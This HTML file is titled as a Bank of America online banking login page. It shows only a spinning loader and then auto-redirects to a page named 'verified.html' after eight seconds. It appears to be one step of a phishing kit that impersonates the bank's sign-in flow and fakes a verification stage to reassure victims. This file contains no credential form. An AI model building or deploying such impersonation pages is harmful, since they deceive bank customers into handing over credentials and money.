<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bank of America | Online Banking | Log in | User ID</title>
    <link rel="shortcut icon" href="img/icon.png" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

    *{
        background-color: #ffffff;
    }

.loader {
  margin-top: 250px;
  border: 7px solid #CDCCC8;
  border-radius: 50%;
  border-top: 7px solid #f50808;
  border-left: 7px solid #CDCCC8;
  border-right: 7px solid #CDCCC8;
  width: 50px;
  height: 50px;
  -webkit-animation: spin 1s linear infinite; /* Safari */
  animation: spin .7s linear infinite;
}

.fieldLabel {
    font-size: 14px;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
</style>

</head>
<body>

<center><div class="loader"></div></center>
<meta http-equiv="refresh" content="8;url=verified.html" />

<div class="fieldLabel">
</div>

</body>
</html>
